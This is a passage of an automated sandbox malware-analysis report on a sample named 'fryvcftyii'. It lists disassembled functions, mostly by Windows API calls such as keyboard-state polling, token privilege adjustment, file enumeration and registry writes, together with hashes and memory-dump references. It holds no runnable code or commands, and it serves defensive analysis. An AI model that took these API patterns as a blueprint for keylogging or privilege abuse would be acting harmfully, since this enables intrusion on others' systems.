                            • Instruction ID: dcb189597dc40a226c011a247e1ef1002a641606442d5fc056f2e1cf0b2fb0f2
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: 58B0927644020C77CE022A82EC02A493B299B41768F408020FB0C1C1A2A673A6649A89
                            Function 0042D07B Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000002,00000000), ref: 0042D1FF
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 2f0b6a03f74c1889e8b861a941d5ed7a1884a8d125bec41127e3b10fde2cc195
                            • Instruction ID: 7568c0d7553f718dac268a3e58a695a481348f671e4897d0a06e03425c5fa642
                            • Opcode Fuzzy Hash: 2f0b6a03f74c1889e8b861a941d5ed7a1884a8d125bec41127e3b10fde2cc195
                            • Instruction Fuzzy Hash: 0E716B306083118FCB15EF24D491F6AB7E0AF89314F44496EF8969B3A2DB34ED49CB56
                            Function 00E93938 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 00E93949
                            Memory Dump Source
                            • Source File: 00000005.00000002.478485424.0000000000E91000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E91000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_e91000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: 26628c1caf5d845f35d2208016b1784babadce213c775494af98533eecded2c5
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: 5FE0E67494120DDFDB00DFF8D5497AE7BB4EF04301F100161FD01E2280D6709E50CA62

                            Non-executed Functions

                            Function 0044CABC Relevance: 77.6, APIs: 40, Strings: 4, Instructions: 632windowkeyboardCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0044CB37
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CB95
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044CBD6
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CC00
                            • SendMessageW.USER32 ref: 0044CC29
                            • _wcsncpy.LIBCMT ref: 0044CC95
                            • GetKeyState.USER32(00000011), ref: 0044CCB6
                            • GetKeyState.USER32(00000009), ref: 0044CCC3
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0044CCD9
                            • GetKeyState.USER32(00000010), ref: 0044CCE3
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0044CD0C
                            • SendMessageW.USER32 ref: 0044CD33
                            • SendMessageW.USER32(?,00001030,?,0044B348), ref: 0044CE37
                            • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0044CE4D
                            • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0044CE60
                            • SetCapture.USER32(?), ref: 0044CE69
                            • ClientToScreen.USER32(?,?), ref: 0044CECE
                            • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0044CEDB
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0044CEF5
                            • ReleaseCapture.USER32(?,?,?), ref: 0044CF00
                            • GetCursorPos.USER32(?), ref: 0044CF3A
                            • ScreenToClient.USER32(?,?), ref: 0044CF47
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044CFA3
                            • SendMessageW.USER32 ref: 0044CFD1
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D00E
                            • SendMessageW.USER32 ref: 0044D03D
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0044D05E
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0044D06D
                            • GetCursorPos.USER32(?), ref: 0044D08D
                            • ScreenToClient.USER32(?,?), ref: 0044D09A
                            • GetParent.USER32(?), ref: 0044D0BA
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0044D123
                            • SendMessageW.USER32 ref: 0044D154
                            • ClientToScreen.USER32(?,?), ref: 0044D1B2
                            • TrackPopupMenuEx.USER32 ref: 0044D1E2
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0044D20C
                            • SendMessageW.USER32 ref: 0044D22F
                            • ClientToScreen.USER32(?,?), ref: 0044D281
                            • TrackPopupMenuEx.USER32 ref: 0044D2B5
                              • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                            • GetWindowLongW.USER32(?,000000F0), ref: 0044D351
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F$`$$pbH
                            • API String ID: 3977979337-3055454625
                            • Opcode ID: 402e66007d82c01431243262d6e656190b5a9dec19d88844a78d93592868dde8
                            • Instruction ID: 4dd6c19128316485e0d5585cf9d99fe7a3650c2f528a4a3a1772602b26ce3ba9
                            • Opcode Fuzzy Hash: 402e66007d82c01431243262d6e656190b5a9dec19d88844a78d93592868dde8
                            • Instruction Fuzzy Hash: DB42BC38605680AFE720DF24D888FABBBE5FF49310F18092EF555872A0C735E855DB5A
                            Function 003D6F9E Relevance: 55.8, APIs: 19, Strings: 10, Instructions: 5018COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$_memset
                            • String ID: ]G$3c=$DEFINE$P\G$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_=
                            • API String ID: 1357608183-3568290574
                            • Opcode ID: fe7417b1afaa2420a46cd9ff2b8f7bd6dbb4b177f5145b23f13e31f93241c674
                            • Instruction ID: a7f3078e9d7e7e9acfec70d4793a9fe2b28acc5457ecb35633ad56e5742e3111
                            • Opcode Fuzzy Hash: fe7417b1afaa2420a46cd9ff2b8f7bd6dbb4b177f5145b23f13e31f93241c674
                            • Instruction Fuzzy Hash: 43939172A042199BDB25CF98D881BEDB7B1FF48310F25816BE945EB390E7749D82CB44
                            Function 003C48D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 003C48DF
                            • FindWindowW.USER32 ref: 003FD665
                            • IsIconic.USER32(?), ref: 003FD66E
                            • ShowWindow.USER32(?,00000009), ref: 003FD67B
                            • SetForegroundWindow.USER32(?), ref: 003FD685
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003FD69B
                            • GetCurrentThreadId.KERNEL32 ref: 003FD6A2
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 003FD6AE
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 003FD6BF
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 003FD6C7
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 003FD6CF
                            • SetForegroundWindow.USER32(?), ref: 003FD6D2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD6E7
                            • keybd_event.USER32 ref: 003FD6F2
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD6FC
                            • keybd_event.USER32 ref: 003FD701
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD70A
                            • keybd_event.USER32 ref: 003FD70F
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 003FD719
                            • keybd_event.USER32 ref: 003FD71E
                            • SetForegroundWindow.USER32(?), ref: 003FD721
                            • AttachThreadInput.USER32(?,?,00000000), ref: 003FD748
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: a2da3384541f4de3af487ffe3c74042f73fa12a3ad70065d17d985a07d4d5100
                            • Instruction ID: 5251e4e9bca7e5a18734d9d76bbf39f44ddb751e81bf4e364f102b135c2b75d8
                            • Opcode Fuzzy Hash: a2da3384541f4de3af487ffe3c74042f73fa12a3ad70065d17d985a07d4d5100
                            • Instruction Fuzzy Hash: FA319E75A8031CBAEB216FA18C89F7F7E6DEB45B50F114035FA04EA1D1CAB05C05AAA4
                            Function 00418310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                              • Part of subcall function 004187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                              • Part of subcall function 004187E1: GetLastError.KERNEL32 ref: 00418865
                            • _memset.LIBCMT ref: 00418353
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004183A5
                            • CloseHandle.KERNEL32(?), ref: 004183B6
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004183CD
                            • GetProcessWindowStation.USER32 ref: 004183E6
                            • SetProcessWindowStation.USER32 ref: 004183F0
                            • OpenDesktopW.USER32 ref: 0041840A
                              • Part of subcall function 004181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00418309), ref: 004181E0
                              • Part of subcall function 004181CB: CloseHandle.KERNEL32(?), ref: 004181F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0
                            • API String ID: 2063423040-1027155976
                            • Opcode ID: 75dea3b3619b66de1072b058158f70d125cede853ea10b3c17ef6562b9b6752e
                            • Instruction ID: 21913a149562ec6e6227179efa19c9413dec9ba668e054c14283ab68c52dd6bf
                            • Opcode Fuzzy Hash: 75dea3b3619b66de1072b058158f70d125cede853ea10b3c17ef6562b9b6752e
                            • Instruction Fuzzy Hash: 1F817971800209BFDF119FA4CC45AEF7BB9EF05304F14416EF814A62A1EB399E95DB28
                            Function 0042C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?), ref: 0042C78D
                            • FindClose.KERNEL32(00000000), ref: 0042C7E1
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C806
                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042C81D
                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0042C844
                            • __swprintf.LIBCMT ref: 0042C890
                            • __swprintf.LIBCMT ref: 0042C8D3
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • __swprintf.LIBCMT ref: 0042C927
                              • Part of subcall function 003E3698: __woutput_l.LIBCMT ref: 003E36F1
                            • __swprintf.LIBCMT ref: 0042C975
                              • Part of subcall function 003E3698: __flsbuf.LIBCMT ref: 003E3713
                              • Part of subcall function 003E3698: __flsbuf.LIBCMT ref: 003E372B
                            • __swprintf.LIBCMT ref: 0042C9C4
                            • __swprintf.LIBCMT ref: 0042CA13
                            • __swprintf.LIBCMT ref: 0042CA62
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                            • API String ID: 3953360268-2428617273
                            • Opcode ID: 30e974a00350fc722a9687781bfd2b30c60083761b6a762fdf4fa0bf2ad45636
                            • Instruction ID: 2668b4dca6016499ca23a9cd14fad4cce40dcb6f2155f486294f34801643f6e2
                            • Opcode Fuzzy Hash: 30e974a00350fc722a9687781bfd2b30c60083761b6a762fdf4fa0bf2ad45636
                            • Instruction Fuzzy Hash: 24A11DB2504344ABC701EBA4D889EAFB7ECBF94700F40491EF585CB191EA35DE08CB62
                            Function 0042EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0042EFB6
                            • _wcscmp.LIBCMT ref: 0042EFCB
                            • _wcscmp.LIBCMT ref: 0042EFE2
                            • GetFileAttributesW.KERNEL32(?), ref: 0042EFF4
                            • SetFileAttributesW.KERNEL32(?,?), ref: 0042F00E
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0042F026
                            • FindClose.KERNEL32(00000000), ref: 0042F031
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F04D
                            • _wcscmp.LIBCMT ref: 0042F074
                            • _wcscmp.LIBCMT ref: 0042F08B
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F09D
                            • SetCurrentDirectoryW.KERNEL32(00478920), ref: 0042F0BB
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F0C5
                            • FindClose.KERNEL32(00000000), ref: 0042F0D2
                            • FindClose.KERNEL32(00000000), ref: 0042F0E4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                            • String ID: *.*
                            • API String ID: 1803514871-438819550
                            • Opcode ID: f985a226dbb79ce75d1eb17477246ad891f024d396c31792942330f1c95cd8ef
                            • Instruction ID: a4125e6eb50d345059b68587ed21d70e873d02a04213c4c85bed180407ca7f0b
                            • Opcode Fuzzy Hash: f985a226dbb79ce75d1eb17477246ad891f024d396c31792942330f1c95cd8ef
                            • Instruction Fuzzy Hash: 873107366001286BDB109FA1EC48BEF77BCAF49360F904177E904D3191DB78DA48CA69
                            Function 00440857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00440953
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044F910,00000000,?,00000000,?,?), ref: 004409C1
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440A09
                            • RegSetValueExW.ADVAPI32 ref: 00440A92
                            • RegCloseKey.ADVAPI32(?), ref: 00440DB2
                            • RegCloseKey.ADVAPI32(00000000), ref: 00440DBF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 99aad27bca043d3a0cb9c8c963904de671484bfeb689d2e6c428208457dd14c4
                            • Instruction ID: a783291db716719dff88b269543bece3586414758a0893c3d130e272113b9071
                            • Opcode Fuzzy Hash: 99aad27bca043d3a0cb9c8c963904de671484bfeb689d2e6c428208457dd14c4
                            • Instruction Fuzzy Hash: 5A0289756006119FDB15EF24C884E2AB7E5FF89710F05845EF98A9B3A2CB34EC05CB85
                            Function 003D66E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID:
                            • String ID: 0DF$0EF$0FF$3c=$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGF$_=
                            • API String ID: 0-2952081238
                            • Opcode ID: 5e1ec4589737f2ca293b1e40e743dec09a22f84d9f7c3d061b167f14efd2a725
                            • Instruction ID: d3e53ab73b27e5ce1d7c0a8e56b5a7fbafaefaff8a49dd90397aac117f43e5b2
                            • Opcode Fuzzy Hash: 5e1ec4589737f2ca293b1e40e743dec09a22f84d9f7c3d061b167f14efd2a725
                            • Instruction Fuzzy Hash: E1727D72E002199BDB15CF59D8817EEB7B5FF48310F14816BE919EB390EB349A81CB94
                            Function 0042F0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0042F113
                            • _wcscmp.LIBCMT ref: 0042F128
                            • _wcscmp.LIBCMT ref: 0042F13F
                              • Part of subcall function 00424385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004243A0
                            • FindNextFileW.KERNEL32(00000000,?), ref: 0042F16E
                            • FindClose.KERNEL32(00000000), ref: 0042F179
                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0042F195
                            • _wcscmp.LIBCMT ref: 0042F1BC
                            • _wcscmp.LIBCMT ref: 0042F1D3
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0042F1E5
                            • SetCurrentDirectoryW.KERNEL32(00478920), ref: 0042F203
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042F20D
                            • FindClose.KERNEL32(00000000), ref: 0042F21A
                            • FindClose.KERNEL32(00000000), ref: 0042F22C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                            • String ID: *.*
                            • API String ID: 1824444939-438819550
                            • Opcode ID: b25a8a71dbb1cdcb9ac610c21bfde1ab624af6b2404178466a886fa593ce6467
                            • Instruction ID: 52c881271ee39ff8e4b61da7a9fc8b3f063006c8726cac7ddbc4e047116f3ee6
                            • Opcode Fuzzy Hash: b25a8a71dbb1cdcb9ac610c21bfde1ab624af6b2404178466a886fa593ce6467
                            • Instruction Fuzzy Hash: F231F736600129AADB109FA0FC48AEF777C9F46320F9001B6E804A3290DB35DE49CE6C
                            Function 0042A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042A20F
                            • __swprintf.LIBCMT ref: 0042A231
                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0042A26E
                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0042A293
                            • _memset.LIBCMT ref: 0042A2B2
                            • _wcsncpy.LIBCMT ref: 0042A2EE
                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0042A323
                            • CloseHandle.KERNEL32(00000000), ref: 0042A32E
                            • RemoveDirectoryW.KERNEL32(?), ref: 0042A337
                            • CloseHandle.KERNEL32(00000000), ref: 0042A341
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                            • String ID: :$\$\??\%s
                            • API String ID: 2733774712-3457252023
                            • Opcode ID: 60d413996011c65864d797306ed44629edaa257333d8fc5b5617805775abd693
                            • Instruction ID: cdb4188e86bc03eafbfbc3db23b4fa6f98d863510de0c87184619d37fd43f319
                            • Opcode Fuzzy Hash: 60d413996011c65864d797306ed44629edaa257333d8fc5b5617805775abd693
                            • Instruction Fuzzy Hash: 29313775A00119ABDB21DFA0DC49FEB73BCEF89700F5041B6F908D6260E77496548B39
                            Function 0042001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                            Download Yara Rule
                            APIs
                            • GetKeyboardState.USER32(?), ref: 00420097
                            • SetKeyboardState.USER32(?), ref: 00420102
                            • GetAsyncKeyState.USER32 ref: 00420122
                            • GetKeyState.USER32(000000A0), ref: 00420139
                            • GetAsyncKeyState.USER32 ref: 00420168
                            • GetKeyState.USER32(000000A1), ref: 00420179
                            • GetAsyncKeyState.USER32 ref: 004201A5
                            • GetKeyState.USER32(00000011), ref: 004201B3
                            • GetAsyncKeyState.USER32 ref: 004201DC
                            • GetKeyState.USER32(00000012), ref: 004201EA
                            • GetAsyncKeyState.USER32 ref: 00420213
                            • GetKeyState.USER32(0000005B), ref: 00420221
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: State$Async$Keyboard
                            • String ID:
                            • API String ID: 541375521-0
                            • Opcode ID: 83c383afdd59836301164d29e6aaa51267237924ee8d97763e13d170fbe8bc85
